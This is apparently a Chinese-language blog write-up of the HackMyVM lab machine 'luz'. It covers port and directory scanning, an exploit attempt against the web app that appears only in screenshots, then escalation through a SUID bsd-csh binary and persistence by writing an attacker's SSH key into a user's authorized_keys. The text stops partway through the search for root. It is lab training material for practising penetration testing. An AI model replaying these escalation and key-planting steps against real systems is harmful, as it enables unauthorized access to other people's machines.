{"id":639,"date":"2024-04-26T22:58:28","date_gmt":"2024-04-26T14:58:28","guid":{"rendered":"http:\/\/162.14.82.114\/?p=639"},"modified":"2024-04-26T22:58:28","modified_gmt":"2024-04-26T14:58:28","slug":"hmv-_-luz","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/639\/04\/26\/2024\/","title":{"rendered":"hmv[-_-]luz"},"content":{"rendered":"<h1>luz<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256844.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256844.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426204620059\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256440.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256440.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426204729229\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ rustscan -a 192.168.0.158 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.158:22\nOpen 192.168.0.158:80\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\nWarning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex &#039;^HTTP\/1\\.1 \\d\\d\\d (?:[^\\r\\n]*\\r\\n(?!\\r\\n))*?.*\\r\\nServer: Virata-EmWeb\/R([\\d_]+)\\r\\nContent-Type: text\/html; ?charset=UTF-8\\r\\nExpires: .*&lt;title&gt;HP (Color |)LaserJet ([\\w._ -]+)&nbsp;&nbsp;&nbsp;&#039;\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 08:49 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nInitiating Ping Scan at 08:49\nScanning 192.168.0.158 [2 ports]\nCompleted Ping Scan at 08:49, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 08:49\nCompleted Parallel DNS resolution of 1 host. at 08:49, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 08:49\nScanning luz (192.168.0.158) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.158\nDiscovered open port 22\/tcp on 192.168.0.158\nCompleted Connect Scan at 08:49, 0.00s elapsed (2 total ports)\nInitiating Service scan at 08:49\nScanning 2 services on luz (192.168.0.158)\nCompleted Service scan at 08:49, 6.26s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.158.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.23s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNmap scan report for luz (192.168.0.158)\nHost is up, received syn-ack (0.00038s latency).\nScanned at 2024-04-26 08:49:28 EDT for 7s\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 5f:9e:28:74:86:8e:d7:5b:bd:96:00:4b:d0:7f:56:e3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJdeakQuX\/KhgJtCHKPXBvbBberybpFXyJCNY133fb6wXIblN9C0KqbjlK9F7dky5mhp2dvFNhQp7OyRp26Oq60=\n|   256 fb:3b:fd:9c:9f:4a:7c:8c:1e:a8:27:e2:8d:bf:2b:e5 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOse0b6oOXfVJOgCDyK93vOjbOlyMHaQyfx5V5aFOaor\n80\/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=UTF-8).\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 08:49\nCompleted NSE at 08:49, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.22 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.158 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.158\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              html,php,zip,bak,jpg,txt\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 19059]\n\/home.php             (Status: 200) [Size: 8979]\n\/about.php            (Status: 200) [Size: 637]\n\/login.php            (Status: 200) [Size: 1579]\n\/header.php           (Status: 200) [Size: 1780]\n\/signup.php           (Status: 200) [Size: 2034]\n\/admin                (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/admin\/]\n\/assets               (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/assets\/]\n\/footer.php           (Status: 200) [Size: 2862]\n\/css                  (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/css\/]\n\/database             (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/database\/]\n\/js                   (Status: 301) [Size: 178] [--&gt; http:\/\/192.168.0.158\/js\/]\n\/head.php             (Status: 200) [Size: 0]\n\/checkout.php         (Status: 500) [Size: 0]\n\/readme.txt           (Status: 200) [Size: 1531]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257725.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257725.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426205048816\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262256600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426205105385\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4ee5\u53ca\u767b\u5f55\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257428.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257428.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426205141109\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u6709\u7ba1\u7406\u5458\u767b\u5f55\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257787.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257787.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426205125729\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u6f0f\u6d1e\u67e5\u627e<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257691.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257691.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426222503714\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257290.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262257290.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426222602131\" style=\"zoom: 40%;\" \/><\/div><\/p>\n<p>\u989d\u3002\u3002\u3002\u3002\u3002\u65b9\u4fbf\u64cd\u4f5c\uff0c\u8f6c\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258475.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258475.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426222858206\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258982.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404262258982.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240426222911668\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@luz:\/var\/www\/html\/fos\/assets\/img$ cd ..\/..\/..\/\n(remote) www-data@luz:\/var\/www\/html$ ls -la\ntotal 16\ndrwxr-xr-x 3 www-data www-data 4096 Jan 11  2023 .\ndrwxr-xr-x 3 root     root     4096 Jan 11  2023 ..\ndrwxr-xr-x 7 www-data www-data 4096 Jan 11  2023 fos\n-rw------- 1 www-data www-data   15 Jan 11  2023 user.txt\n(remote) www-data@luz:\/var\/www\/html$ cat uesr\ncat: uesr: No such file or directory\n(remote) www-data@luz:\/var\/www\/html$ cat user.txt \nHMVn03145n4nk4\n(remote) www-data@luz:\/var\/www\/html$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_ckpasswd\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_system\n\/usr\/lib\/x86_64-linux-gnu\/enlightenment\/utils\/enlightenment_sys\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/bin\/pkexec\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/bsd-csh\n\/usr\/bin\/fusermount3<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/csh\/#suid\">https:\/\/gtfobins.github.io\/gtfobins\/csh\/#suid<\/a><\/p>\n<h3>csh\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@luz:\/var\/www\/html$ \/usr\/bin\/bsd-csh -b\n% whoami;id\naelis\nuid=33(www-data) gid=33(www-data) euid=1000(aelis) egid=1000(aelis) groups=1000(aelis),33(www-data)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6dfb\u52a0ssh\u516c\u94a5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/luz\/aelis        \nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/luz\/aelis\nYour public key has been saved in \/home\/kali\/temp\/luz\/aelis.pub\nThe key fingerprint is:\nSHA256:MQD1vSSF7vACaSAxR2hN4BE5wY9vPBy58j+BblDSigc kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|+OX..oo  ..      |\n|+Bo.   o.o       |\n|.o=... .= o      |\n|Eo *+ . .= .     |\n|..B.+. +S .      |\n|.+.O .. o        |\n| .* . ..         |\n|   + .           |\n|  . ...          |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ls -la \ntotal 24\ndrwxr-xr-x  2 kali kali 4096 Apr 26 10:32 .\ndrwxr-xr-x 73 kali kali 4096 Apr 26 08:47 ..\n-rwxr-xr-x  1 kali kali 6702 Apr 26 10:25 50305.py\n-rw-------  1 kali kali 2590 Apr 26 10:32 aelis\n-rw-r--r--  1 kali kali  563 Apr 26 10:32 aelis.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ cat aelis.pub                     \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBCybFDl8znQ+Hw2GxHKyYqibILjkP5Ix0a7F4XbBbGvNCYV7g6KzoxoHH+eWwocBkqEcD8BD8AJT9yMW\/1tGczskuQaA+yIfzYwoUpytEcxBQzGB\/PW0njrtp3vYW8q63nydtbKLa2Wktw3+OPwRn97osapvRWiauGY1PHoevDsPx8q\/1CU9sDrKX2M\/BhfvaaCAKPWOpzg6VdKEOkxygS+kaKAY4\/fn3mAsbOhn6xT7hpjQTM3q9o9g+1uB9ZnGeBXPTncpcp+0FlBjUsdrZ4BuAp8EJ2Gsxrk53iFd1PmUySdEOeo0W25sKO5ZMQEmcS35m0LdVGvHjn\/FYAHTU1NNMowquFR6BEK8J\/LxBd\/xeD0fQmE6JaB4RTUVVR1M3Pn7+frcBgwEdMIPtc0uSRDLX8GYOn2A514Pcxe26i5+w6gyKBsh4vkkAr0UQXrZSY96YezRqbEW9G+m7ytWMGKf8EkmF2Wz+E366J81+2dERxPwuZs2SZoKDdd3tHuM= kali@kali<\/code><\/pre>\n<pre><code class=\"language-bash\">% cd \/home\n% ls\naelis\n% cd aelis\n% ls -la\ntotal 12168\ndrwxr-x--- 5 aelis aelis     4096 Jan 11  2023 .\ndrwxr-xr-x 3 root  root      4096 Jan 11  2023 ..\n-rw------- 1 aelis aelis       49 Jan 11  2023 .Xauthority\nlrwxrwxrwx 1 aelis aelis        9 Jan 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 aelis aelis      220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 aelis aelis     3771 Jan  6  2022 .bashrc\ndrwx------ 2 aelis aelis     4096 Jan 11  2023 .cache\ndrwxrwxr-x 3 aelis aelis     4096 Jan 11  2023 .local\n-rw-r--r-- 1 aelis aelis      807 Jan  6  2022 .profile\ndrwx------ 2 aelis aelis     4096 Jan 11  2023 .ssh\n-rw-r--r-- 1 aelis aelis        0 Jan 11  2023 .sudo_as_admin_successful\n-rw-r--r-- 1 aelis aelis 12421945 Jan 11  2023 php-fos-db.zip\n% cd .ssh\n% ls -la\ntotal 8\ndrwx------ 2 aelis aelis 4096 Jan 11  2023 .\ndrwxr-x--- 5 aelis aelis 4096 Jan 11  2023 ..\n-rw------- 1 aelis aelis    0 Jan 11  2023 authorized_keys\n% echo &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDBCybFDl8znQ+Hw2GxHKyYqibILjkP5Ix0a7F4XbBbGvNCYV7g6KzoxoHH+eWwocBkqEcD8BD8AJT9yMW\/1tGczskuQaA+yIfzYwoUpytEcxBQzGB\/PW0njrtp3vYW8q63nydtbKLa2Wktw3+OPwRn97osapvRWiauGY1PHoevDsPx8q\/1CU9sDrKX2M\/BhfvaaCAKPWOpzg6VdKEOkxygS+kaKAY4\/fn3mAsbOhn6xT7hpjQTM3q9o9g+1uB9ZnGeBXPTncpcp+0FlBjUsdrZ4BuAp8EJ2Gsxrk53iFd1PmUySdEOeo0W25sKO5ZMQEmcS35m0LdVGvHjn\/FYAHTU1NNMowquFR6BEK8J\/LxBd\/xeD0fQmE6JaB4RTUVVR1M3Pn7+frcBgwEdMIPtc0uSRDLX8GYOn2A514Pcxe26i5+w6gyKBsh4vkkAr0UQXrZSY96YezRqbEW9G+m7ytWMGKf8EkmF2Wz+E366J81+2dERxPwuZs2SZoKDdd3tHuM= kali@kali&#039; &gt; authorized_keys<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ chmod 600 aelis     \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/luz]\n\u2514\u2500$ ssh aelis@192.168.0.158 -i aelis\nThe authenticity of host &#039;192.168.0.158 (192.168.0.158)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:zJ98VzyiXBPwPbYm8Ka23HQda6fosh\/uoEbrEkCKYhE.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.158&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.1 LTS (GNU\/Linux 5.15.0-57-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of vie 26 abr 2024 14:35:42 UTC\n\n  System load:  0.080078125       Processes:               112\n  Usage of \/:   63.1% of 7.77GB   Users logged in:         0\n  Memory usage: 55%               IPv4 address for enp0s3: 192.168.0.158\n  Swap usage:   0%\n\n108 updates can be applied immediately.\n56 of these updates are standard security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Thu Jan 12 07:30:36 2023\naelis@luz:~$ <\/code><\/pre>\n<h3>\u5c1d\u8bd5\u63d0\u6743\u81f3root<\/h3>\n<pre><code class=\"language-bash\">aelis@luz:~$ ls -la\ntotal 12168\ndrwxr-x--- 5 aelis aelis     4096 ene 11  2023 .\ndrwxr-xr-x 3 root  root      4096 ene 11  2023 ..\nlrwxrwxrwx 1 aelis aelis        9 ene 11  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 aelis aelis      220 ene  6  2022 .bash_logout\n-rw-r--r-- 1 aelis aelis     3771 ene  6  2022 .bashrc\ndrwx------ 2 aelis aelis     4096 ene 11  2023 .cache\ndrwxrwxr-x 3 aelis aelis     4096 ene 11  2023 .local\n-rw-r--r-- 1 aelis aelis 12421945 ene 11  2023 php-fos-db.zip\n-rw-r--r-- 1 aelis aelis      807 ene  6  2022 .profile\ndrwx------ 2 aelis aelis     4096 ene 11  2023 .ssh\n-rw-r--r-- 1 aelis aelis        0 ene 11  2023 .sudo_as_admin_successful\n-rw------- 1 aelis aelis       49 ene 11  2023 .Xauthority\naelis@luz:~$ sudo -l\n[sudo] password for aelis: \nsudo: a password is required\naelis@luz:~$ find \/ -perm -u=s -type f 